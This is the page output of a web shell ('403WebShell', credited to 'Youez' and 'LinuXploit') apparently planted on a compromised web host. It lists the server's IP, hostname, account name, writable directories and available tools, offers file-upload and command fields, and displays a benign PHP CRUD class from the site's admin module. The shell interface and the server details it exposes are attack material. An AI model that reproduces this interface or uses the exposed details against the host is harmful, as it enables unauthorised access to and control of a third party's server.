Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.223.195.30
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/Admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/Admin/Crud.php
<?php


namespace Modules\Admin;


use Modules\Admin\Crud\Components\BaseComponent;

class Crud
{

    static protected $modules = [];
    static protected $components = [];

    public static function modules(){
        return static::$modules;
    }

    /**
     * @param $module
     * @return BaseCrudModule
     * @throws \Exception
     */
    public static function module($module){
        $all = static::modules();
        if(empty($all[$module]) or !class_exists($all[$module])) throw new \Exception("CRUD module not found: ".$module);
        return new $all[$module];
    }

    public static function components(){
        return static::$components;
    }

    /**
     * @param $component
     * @return BaseComponent
     * @throws \Exception
     */
    public static function component($component){
        $all = static::components();
        if(empty($all[$component]) or !class_exists($all[$component])) {
            return new BaseComponent();
        }
        return new $all[$component];
    }

    public static function register($arr){
        foreach ($arr as $k=>$v){
            if(!class_exists($v) or !is_subclass_of($v,\Modules\Admin\BaseCrudModule::class)) throw new \Exception("CRUD class must be sub class of BaseCurdModule: ".$v);

            if(array_key_exists($k,static::$modules))
            {
                $class_name = static::$modules[$k];
                if(version_compare($class_name::$version,$v::$version) > 0){
                    static::$modules[$k] = $v;
                }
            }else {
                static::$modules[$k] = $v;
            }
        }
    }

    public static function registerComponent($arr){
        foreach ($arr as $k=>$v){
            if(!class_exists($v) or !is_subclass_of($v,\Modules\Admin\Crud\Components\BaseComponent::class)) throw new \Exception("CRUD Component class must be sub class of BaseComponent");

            if(array_key_exists($k,static::$modules))
            {
                $class_name = static::$modules[$k];
                if(version_compare($class_name::$version,$v::$version) > 0){
                    static::$modules[$k] = $v;
                }
            }else {
                static::$modules[$k] = $v;
            }
        }
    }

    public static function layout(BaseCrudModule $crudModule,$layouts = []){
        foreach ($layouts as $name => $layout){
            $com = static::component($name);
            $com->setData($layout);
            $com->setName($name);
            $com->setCurdModule($crudModule);
            $com->render();
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit